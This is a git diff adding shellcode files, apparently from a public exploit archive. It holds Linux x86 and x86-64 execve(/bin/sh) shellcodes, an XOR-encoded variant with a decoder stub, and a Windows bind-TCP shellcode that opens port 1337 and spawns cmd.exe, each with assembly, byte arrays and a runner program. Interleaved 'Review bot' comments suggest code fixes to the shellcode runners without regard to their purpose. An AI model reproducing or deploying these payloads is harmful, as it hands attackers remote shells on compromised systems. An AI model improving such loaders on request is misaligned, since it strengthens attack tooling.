+ mov r8, 0x746c61682f2f2f2f
+ mov r10, 0x6e6962732f2f2f2f
+ push r8
+ push r10
+ mov rdi, rsp
+
+ push rax
+ push rcx
+ push rdi
+ mov rsi, rsp
+
+ add rax, 59
+ syscall
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/49770.c b/shellcodes/linux_x86-64/49770.c
new file mode 100644
index 000000000..a8eed827d
--- /dev/null
+++ b/shellcodes/linux_x86-64/49770.c
@@ -0,0 +1,46 @@
+# Linux/x64 - execve(/bin/sh) Shellcode (21 bytes)
+# Author: s1ege
+# Tested on: x86_64 GNU/Linux
+# Shellcode Length: 21
+
+/*
+
+################################################
+objdump disassembly
+################################################
+401000: 50 push %rax
+401001: 48 31 d2 xor %rdx,%rdx
+401004: 48 bb 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rbx
+40100b: 2f 73 68
+40100e: 53 push %rbx
+40100f: 54 push %rsp
+401010: 5f pop %rdi
+401011: b0 3b mov $0x3b,%al
+401013: 0f 05 syscall
+################################################
+
+################################################
+shellcode.asm
+################################################
+; nasm -felf64 shellcode.asm && ld shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push rax
+xor rdx, rdx
+mov rbx, 0x68732f2f6e69622f
+push rbx
+push rsp
+pop rdi
+mov al, 59
+syscall
+################################################
+*/
+unsigned char shellcode[] = \
+"\x50\x48\x31\xd2\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
+
+int main() {
+int (*ret)() = (int(*)())shellcode;
+ret();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/49768.c b/shellcodes/linux_x86/49768.c
new file mode 100644
index 000000000..f7fd5ce4b
--- /dev/null
+++ b/shellcodes/linux_x86/49768.c
@@ -0,0 +1,30 @@
+# Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)
+# Author: s1ege
+# Tested on: i686 GNU/Linux
+# Shellcode length: 17
+
+/*
+; nasm -felf32 shellcode.asm && ld -melf_i386 shellcode.o -o shellcode
+section .text
+global _start
+_start:
+push 0x0b
+pop eax
+push 0x0068732f
+push 0x6e69622f
+mov ebx, esp
+int 0x80
+*/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x6a\x0b\x58\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
+
+int main() {
+printf("Shellcode Length: %lu\n", sizeof(code)-1); // subtract null byte
+int (*ret)() = (int(*)())code;
+ret();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/49976.c b/shellcodes/linux_x86/49976.c
new file mode 100644
index 000000000..325b467f9
--- /dev/null
+++ b/shellcodes/linux_x86/49976.c
@@ -0,0 +1,74 @@
+# Exploit Title: Linux/x86 - execve /bin/sh Shellcode (fstenv eip GetPC technique) (70 bytes, xor encoded)
+# Date: 09/06/2021
+# Exploit Author: d7x
+# Tested on: Ubuntu x86
+
+/***
+ shellcode with XOR decoder stub and fstenv MMX FPU
+ spawning a /bin/sh shell
+
+ uses the fstenv GetPC technique to get the memory address dynamically
+ (alternative to jmp-call-pop)
+
+ Usage: gcc -fno-stack-protector -z execstack -o mmx-xor-decoder_eip mmx-xor-decoder_eip.c
+ ./mmx-xor-decoder_eip
+ Shellcode Length: 70
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # ps -p $$
+ PID TTY TIME CMD
+ 24045 pts/4 00:00:00 sh
+
+ *** Created by d7x
+ https://d7x.promiselabs.net
+ https://www.promiselabs.net ***
+***/
+
+/***
+; shellcode assembly
+
+global _start
+
+section .text
+_start:
+ fldz
+ fstenv [esp-0xc]
+ pop edi ; put eip into edi
+ add edi, 37 ; offset to shellcode decoder stub, 0x08048085-0x8048060 (decoder_value, fldz)
+
+ lea esi, [edi + 8]
+ xor ecx, ecx
+ mov cl, 4
+
+decode:
+ movq mm0, qword [edi]
+ movq mm1, qword [esi]
+ pxor mm0, mm1
+ movq qword [esi], mm0
+ add esi, 0x8
+ loop decode
+
+ jmp short EncodedShellcode
+
+shellcode:
+
+ decoder_value: db 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d, 0x7d
+ EncodedShellcode: db 0x4c,0xbd,0x2d,0x15,0x52,0x52,0x0e,0x15,0x15,0x52,0x1f,0x14,0x13,0xf4,0x9e,0x2d,0xf4,0x9f,0x2e,0xf4,0x9c,0xcd,0x76,0xb0,0xfd ; xored against 0x7d
+
+***/
+
+#include
+#include
+
+unsigned char shellcode[] = \
+"\xd9\xee\x9b\xd9\x74\x24\xf4\x5f\x83\xc7\x25\x8d\x77\x08\x31\xc9\xb1\x04\x0f\x6f\x07\x0f\x6f\x0e\x0f\xef\xc1\x0f\x7f\x06\x83\xc6\x08\xe2\xef\xeb\x08\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x9b\x6a\xfa\xc2\x85\x85\xd9\xc2\xc2\x85\xc8\xc3\xc4\x23\x49\xfa\x23\x48\xf9\x23\x4b\x1a\xa1\x67\x2a";
+
+void main(void)
+{
+ printf("Shellcode Length: %d\n", strlen(shellcode));
+
+ int(*ret)() = (int(*)())shellcode;
+
+ ret();
+
+}
\ No newline at end of file
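Review bot: `printf("Shellcode Length: %d\n", strlen(shellcode));` in `main` passes a `size_t` to `%d` and an `unsigned char *` to `strlen`, which is undefined behaviour on the format and a pointer-type mismatch on the argument; `printf("Shellcode Length: %zu\n", strlen((const char *)shellcode));` fixes both, and the same `%d`/`strlen` pairing appears in the `main` of shellcodes/windows_x86/50384.c. `void main(void)` is not a conforming signature for a hosted C program; `int main(void)` ending in `return 0;` is. The two `#include` directives carry no header name as rendered here, which looks like an extraction artifact rather than the file's content; confirm against the raw file.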
diff --git a/shellcodes/windows_x86/50384.c b/shellcodes/windows_x86/50384.c
new file mode 100644
index 000000000..c824c7340
--- /dev/null
+++ b/shellcodes/windows_x86/50384.c
@@ -0,0 +1,324 @@
+; Name: Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
+; Author: h4pp1n3ss
+; Date: Wed 10/06/2021
+; Tested on: Microsoft Windows [Version 10.0.19042.1237]
+
+; Description:
+; This a bind tcp shellcode that open a listen socket on 0.0.0.0 and port 1337. In order to accomplish this task the shellcode uses
+; the PEB method to locate the baseAddress of the required module and the Export Directory Table to locate symbols.
+; Also the shellcode uses a hash function to gather dynamically the required symbols without worry about the length.
+
+ start: ;
+
+ mov ebp, esp ;
+ add esp, 0xfffff9f0 ; Avoid null-bytes and stack clobbering
+
+ find_kernel32:
+
+ xor ecx, ecx ; ECX = Null
+ mov esi,fs:[ecx+0x30] ; ESI = &(PEB) ([FS:0x30])
+ mov esi,[esi+0x0C] ; ESI = PEB->Ldr
+ mov esi,[esi+0x1C] ; ESI = PEB->Ldr.InInitOrder
+
+ next_module: ;
+
+ mov ebx, [esi+0x08] ; EBX = InInitOrder[X].base_address
+ mov edi, [esi+0x20] ; EDI = InInitOrder[X].module_name
+ mov esi, [esi] ; ESI = InInitOrder[X].flink (next module)
+ cmp [edi+12*2], cx ; (unicode) module_name[12] == 0x00 / we found kernel32.dll?
+ jne next_module ; No: try next module
+
+ find_function_shorten: ;
+
+ jmp find_function_shorten_bnc ; short jump
+
+ find_function_ret: ;
+
+ pop esi ; ESI = POP return addres
+ mov [ebp+0x04], esi ; Save find_function address for later usage
+ jmp resolve_symbols_kernel32 ;
+
+ find_function_shorten_bnc: ;
+ call find_function_ret ; Call fund_function_ret PUSH ret address into the stack
+
+ find_function: ;
+
+ pushad ; Save all registers
+ mov eax, [ebx+0x3c] ; Offset of PE signature
+ mov edi, [ebx+eax+0x78] ; Export Table Directory RVA
+ add edi, ebx ; Export Table Directory VMA
+ mov ecx, [edi+0x18] ; NumberOfNames
+ mov eax, [edi+0x20] ; AddressOfNames RVA
+ add eax, ebx ; AddresOfNames VMA
+ mov [ebp-4], eax ; Save AddressOfName VMA for later usage
+
+ find_function_loop: ;
+ jecxz find_function_finished ; Jump to the end if ECX is 0
+ dec ecx ; Decrement our counter
+ mov eax, [ebp-4] ; Restore AddressOfNames VMA
+ mov esi, [eax+ecx*4] ; Get the RVA of the symbol name
+ add esi, ebx ; Set ESI to the VMA of the current symbol name
+
+ compute_hash: ;
+ xor eax, eax ; EAX = Null
+ cdq ; Null EDX
+ cld ; Clear direction flag
+
+ compute_hash_again:
+ lodsb ; Load the next bytes from ESI into al
+ test al, al ; Check for Null terminator
+ jz compute_hash_finished ; If the ZF is set, we've hit the NULL term
+ ror edx, 0x0d ; Rotate edx 13 bits to the right
+ add edx, eax ; Add the new byte to the accumulator
+ jmp compute_hash_again ; Next iteration
+
+ compute_hash_finished: ;
+
+ find_function_compare:
+ cmp edx, [esp+0x24] ; Compare the computed hash with the requested hash
+ jnz find_function_loop ; If it doesn't match go back to find_function_loop
+ mov edx, [edi+0x24] ; AddressOfNameOrdinals RVA
+ add edx, ebx ; AddressOfNameOrdinals VMA
+ mov cx, [edx+2*ecx] ; Extrapolate the function's ordinal
+ mov edx, [edi+0x1c] ; AddressOfFunctions RVA
+ add edx, ebx ; AddressOfFunctions VMA
+ mov eax, [edx+4*ecx] ; Get the function RVA
+ add eax, ebx ; Get the function VMA
+ mov [esp+0x1c], eax ; Overwrite stack version of eax from pushad
+
+ find_function_finished: ;
+ popad ; Restore registers
+ ret ;
+
+ resolve_symbols_kernel32: ;
+ push 0x78b5b983 ; TerminateProcess hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x10], eax ; Save TerminateProcess address for later usage
+ push 0xec0e4e8e ; LoadLibraryA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x14], eax ; Save LoadLibraryA address for later usage
+ push 0x16b3fe72 ; CreateProcessA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x18], eax ; Save CreateProcessA address for later usage
+
+ load_ws2_32: ;
+ xor eax, eax ; EAX = Null
+ mov ax, 0x6c6c ; EAX = 0x6c6c
+ push eax ; ESP = "ll"
+ push dword 0x642e3233 ; ESP = "32.dll"
+ push dword 0x5f327377 ; ESP = "ws2_32.dll"
+ push esp ; ESP = &("ws2_32.dll")
+ call dword [ebp+0x14] ; Call LoadLibraryA
+
+resolve_symbols_ws2_32:
+ mov ebx, eax ; Move the base address of ws2_32.dll to EBX
+ push 0x3bfcedcb ; WSAStartup hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x1C], eax ; Save WSAStartup address for later usage
+ push 0xadf509d9 ; WSASocketA hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x20], eax ; Save WSASocketA address for later usage
+ push 0xc7701aa4 ; Bind hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x24], eax ; Save Bind address for later usage
+ push 0xe92eada4 ; listen hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x28], eax ; Save listen address for later usage
+ push 0x9f5b7976 ; WSAGetLastError hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x32], eax ; Save WSAGetLastError address for later usage
+ push 0x498649e5 ; accept hash
+ call dword [ebp+0x04] ; Call find_function
+ mov [ebp+0x36], eax ; Save acccept address for later usage
+
+ call_wsastartup: ;
+ mov eax, esp ; Move ESP to EAX
+ mov cx, 0x590 ; Move 0x590 to CX
+ sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
+ push eax ; Push lpWSAData
+ xor eax, eax ; EAX = Null
+ mov ax, 0x0202 ; Move version to AX
+ push eax ; Push wVersionRequired (0x00000202)
+ call dword [ebp+0x1C] ; Call WSAStartup(WORD wVersionRequired, LPWSADATA lpWSAData)
+
+ call_wsasocketa: ; WSASocketA(AF_INET = 2, SOCK_STREAM = 1, TCP = 6, NULL, NULL, NULL )
+ xor eax, eax ; EAX = Null
+ push eax ; Push dwFlags
+ push eax ; Push g
+ push eax ; Push lpProtocolInfo
+ mov al, 0x06 ; Move AL, IPPROTO_TCP
+ push eax ; Push protocol
+ sub al, 0x05 ; Substract 0x05 from AL, AL = 0x01
+ push eax ; Push type
+ inc eax ; Increase EAX, EAX = 0x02
+ push eax ; Push af
+ call dword [ebp+0x20] ; Call WSASocketA(2,1,6,0,0,0)
+
+ create_sockaddr_in_struct: ; sockaddr_in {AF_INET = 2; p1337 = 0x3905; INADDR_ANY = 0x5D00A8C0}
+ mov esi, eax ; Move the SOCKET descriptor to ESI
+ xor eax, eax ; EAX = Null
+ push eax ; Push sin_addr (any address 0.0.0.0)
+ mov ax, 0x3905 ; Move the sin_port (example: 1337) to AX (EAX = 0x00003905)
+ shl eax, 0x10 ; Left shift EAX by 0x10 bytes (EAX = 0x39050000)
+ add ax, 0x02 ; Add 0x02 (AF_INET) to AX
+ push eax ; Push sin_port & sin_family
+ push esp ; Push pointer to the sockaddr_in structure
+ pop edi ; EDI = &(sockaddr_in)
+
+ call_bind: ; bind(SOCKET *s = ESI, const sockaddr *addr = EDI, int namelen = 0x16)
+ xor eax, eax ; EAX = Null
+ add al, 0x16 ; Set AL to 0x16
+ push eax ; Push namelen
+ push edi ; Push *addr
+ push esi ; Push s
+ call dword [ebp+0x24] ; Call bind
+
+ call_wsagetlaserror: ; WSAGetLastError() (just for debugging purpouse)
+ call dword [ebp+0x32] ; Call WSAGetLastError
+
+ call_listen: ;
+ xor eax, eax ; EAX = Null
+ push eax ; Push backlog
+ push esi ; Push s
+ call dword [ebp+0x28] ; Call WS2_32!listen
+
+ call_accept: ; accept( SOCKET s, sockaddr *addr, int *addrlen)
+ xor eax, eax ; EAX = Null
+ push eax ; Push *addrlen (optional)
+ push eax ; Push *addr (optional)
+ push esi ; Push socket HANDLE from WSASocketA()
+ call dword [ebp+0x36] ; Call accept(SOCKET s ,Null, Null)
+
+ create_startupinfoa: ;
+ mov esi, eax ; Save Handle returned from accept() into ESI
+ push esi ; Push hStdError
+ push esi ; Push hStdOutput
+ push esi ; Push hStdInput
+ xor eax, eax ; EAX = Null
+ push eax ; Push lpReserved2
+ push eax ; Push cbReserved2 & wShowWindow
+ mov al, 0x80 ; Move 0x80 to AL
+ xor ecx, ecx ; EAX = Null
+ mov cl, 0x80 ; Move 0x80 to CL
+ add eax, ecx ; Set EAX to 0x100
+ push eax ; Push dwFlags
+ xor eax, eax ; EAX = Null
+ push eax ; Push dwFillAttribute
+ push eax ; Push dwYCountChars
+ push eax ; Push dwXCountChars
+ push eax ; Push dwYSize
+ push eax ; Push dwXSize
+ push eax ; Push dwY
+ push eax ; Push dwX
+ push eax ; Push lpTitle
+ push eax ; Push lpDesktop
+ push eax ; Push lpReserved
+ mov al, 0x44 ; Move 0x44 to AL
+ push eax ; Push cb
+ push esp ; Push pointer to the STARTUPINFOA structure
+ pop edi ; Store pointer to STARTUPINFOA in EDI
+
+ create_cmd_string: ;
+ mov eax, 0xff9a879b ; Move 0xff9a879b into EAX
+ neg eax ; Negate EAX, EAX = 00657865
+ push eax ; Push part of the "cmd.exe" string
+ push 0x2e646d63 ; Push the remainder of the "cmd.exe" string
+ push esp ; Push pointer to the "cmd.exe" string
+ pop ebx ; Store pointer to the "cmd.exe" string in EBX
+
+ call_createprocessa: ;
+ mov eax, esp ; Move ESP to EAX
+ xor ecx, ecx ; ECX = Null
+ mov cx, 0x390 ; Move 0x390 to CX
+ sub eax, ecx ; Substract CX from EAX to avoid overwriting the structure later
+ push eax ; Push lpProcessInformation
+ push edi ; Push lpStartupInfo
+ xor eax, eax ; EAX = Null
+ push eax ; Push lpCurrentDirectory
+ push eax ; Push lpEnvironment
+ push eax ; Push dwCreationFlags
+ inc eax ; Increase EAX, EAX = 0x01 (TRUE)
+ push eax ; Push bInheritHandles
+ dec eax ; EAX = Null
+ push eax ; Push lpThreadAttributes
+ push eax ; Push lpProcessAttributes
+ push ebx ; Push lpCommandLine
+ push eax ; Push lpApplicationName
+ call dword [ebp+0x18] ; Call CreateProcessA
+
+ call_terminate_process: ;
+ xor eax, eax ; EAX = Null
+ push eax ; uExitCode
+ push 0xffffffff ; HANDLE hProcess
+ call dword [ebp+0x04] ; Call TerminateProcess
+
+
+[*]================================= POC =============================== [*]
+
+
+
+/*
+
+ Shellcode runner author: reenz0h (twitter: @sektor7net)
+
+*/
+#include
+#include
+#include
+#include
+
+// nasm -f win32 shellcode.asm -o shellcode.o
+// objdump -D ./shellcode.o |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
+
+
+unsigned char payload[] =
+ "\x89\xe5\x81\xc4\xf0\xf9\xff\xff\x31\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b"
+ "\x76\x1c\x8b\x5e\x08\x8b\x7e\x20\x8b\x36\x66\x39\x4f\x18\x75\xf2\xeb\x06"
+ "\x5e\x89\x75\x04\xeb\x54\xe8\xf5\xff\xff\xff\x60\x8b\x43\x3c\x8b\x7c\x03"
+ "\x78\x01\xdf\x8b\x4f\x18\x8b\x47\x20\x01\xd8\x89\x45\xfc\xe3\x36\x49\x8b"
+ "\x45\xfc\x8b\x34\x88\x01\xde\x31\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca"
+ "\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x24\x75\xdf\x8b\x57\x24\x01\xda\x66\x8b"
+ "\x0c\x4a\x8b\x57\x1c\x01\xda\x8b\x04\x8a\x01\xd8\x89\x44\x24\x1c\x61\xc3"
+ "\x68\x83\xb9\xb5\x78\xff\x55\x04\x89\x45\x10\x68\x8e\x4e\x0e\xec\xff\x55"
+ "\x04\x89\x45\x14\x68\x72\xfe\xb3\x16\xff\x55\x04\x89\x45\x18\x31\xc0\x66"
+ "\xb8\x6c\x6c\x50\x68\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x55\x14"
+ "\x89\xc3\x68\xcb\xed\xfc\x3b\xff\x55\x04\x89\x45\x1c\x68\xd9\x09\xf5\xad"
+ "\xff\x55\x04\x89\x45\x20\x68\xa4\x1a\x70\xc7\xff\x55\x04\x89\x45\x24\x68"
+ "\xa4\xad\x2e\xe9\xff\x55\x04\x89\x45\x28\x68\x76\x79\x5b\x9f\xff\x55\x04"
+ "\x89\x45\x32\x68\xe5\x49\x86\x49\xff\x55\x04\x89\x45\x36\x89\xe0\x66\xb9"
+ "\x90\x05\x29\xc8\x50\x31\xc0\x66\xb8\x02\x02\x50\xff\x55\x1c\x31\xc0\x50"
+ "\x50\x50\xb0\x06\x50\x2c\x05\x50\x40\x50\xff\x55\x20\x89\xc6\x31\xc0\x50"
+ "\x66\xb8\x05\x39\xc1\xe0\x10\x66\x83\xc0\x02\x50\x54\x5f\x31\xc0\x04\x16"
+ "\x50\x57\x56\xff\x55\x24\xff\x55\x32\x31\xc0\x50\x56\xff\x55\x28\x31\xc0"
+ "\x50\x50\x56\xff\x55\x36\x89\xc6\x56\x56\x56\x31\xc0\x50\x50\xb0\x80\x31"
+ "\xc9\xb1\x80\x01\xc8\x50\x31\xc0\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50"
+ "\xb0\x44\x50\x54\x5f\xb8\x9b\x87\x9a\xff\xf7\xd8\x50\x68\x63\x6d\x64\x2e"
+ "\x54\x5b\x89\xe0\x31\xc9\x66\xb9\x90\x03\x29\xc8\x50\x57\x31\xc0\x50\x50"
+ "\x50\x40\x50\x48\x50\x50\x53\x50\xff\x55\x18\x31\xc0\x50\x6a\xff\xff\x55"
+ "\x04";
+
+unsigned int payload_len = 415;
+
+int main(void) {
+
+ void * exec_mem;
+ BOOL rv;
+ HANDLE th;
+ DWORD oldprotect = 0;
+
+ exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+ RtlMoveMemory(exec_mem, payload, payload_len);
+
+ rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);
+
+ printf("Shellcode Length: %d\n", strlen(payload));
+
+ if ( rv != 0 ) {
+ th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
+ WaitForSingleObject(th, -1);
+
+ }
+
+ return 0;
+}
\ No newline at end of file
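Review bot: In `main`, `exec_mem` is handed to `RtlMoveMemory` and `VirtualProtect` without checking the `VirtualAlloc` result, and `th` goes straight from `CreateThread` into `WaitForSingleObject`; a `NULL` from either call is a crash instead of a diagnostic, so each should be tested before use and the failure reported. `payload_len` is hard-coded to 415 while the array's size is already known to the compiler; `unsigned int payload_len = sizeof payload - 1;` keeps the copy length and the buffer in step if the bytes are ever edited. `WaitForSingleObject(th, -1)` relies on -1 converting to `INFINITE`; spelling it `INFINITE` says what is meant. The four `#include` directives have no header name as rendered here, which looks like an extraction artifact; confirm against the raw file.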